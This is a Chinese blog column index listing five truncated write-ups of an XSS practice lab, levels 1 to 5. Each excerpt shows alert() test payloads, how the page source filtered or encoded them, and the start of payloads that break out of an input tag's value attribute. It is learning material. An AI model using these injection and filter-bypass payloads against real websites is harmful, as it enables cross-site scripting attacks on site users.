
3.XSS之旅
XSS
qwsn
努力努力再努力
展开
-
5.xss之旅—Level5
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:脚本被写作input标签的value属性内,script被过滤 <input name=keyword value="<scr_ipt>alert(/qwsn/)</script>"> 构造paylod: "> onclic...原创 2020-03-13 17:40:06 · 1811 阅读 · 0 评论 -
4.xss之旅—level4
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:script脚本被写在input标签的value的属性值内,<>被替换为空字符 <input name=keyword value="scriptalert(/qwsn/)/script"> 构造payload:闭合value属性,注释inpu...原创 2020-03-13 17:38:57 · 1734 阅读 · 0 评论 -
3.xss之旅—Level3
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:script脚本被写在input标签的value的属性值内,<被<替换,>被>替换了 <input name=keyword value=' <script>alert(/qwsn/)<...原创 2020-03-13 17:37:52 · 1751 阅读 · 0 评论 -
2.xss之旅—Level2
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:script脚本被写在input标签的value的属性值内, <input name=keyword value="<script>alert(/qwsn/)</script>"> 构造payload:闭合value属性和input...原创 2020-03-13 17:36:53 · 1675 阅读 · 0 评论 -
1.xss之旅—Level1
XSS过程: URL栏: ?name=<script>alert(123)</script> ?name=<script>alert('123')</script> ?name=<script>alert("123")</script> ?name=<script>alert(/123/)</script&g...原创 2020-03-13 17:35:18 · 1632 阅读 · 0 评论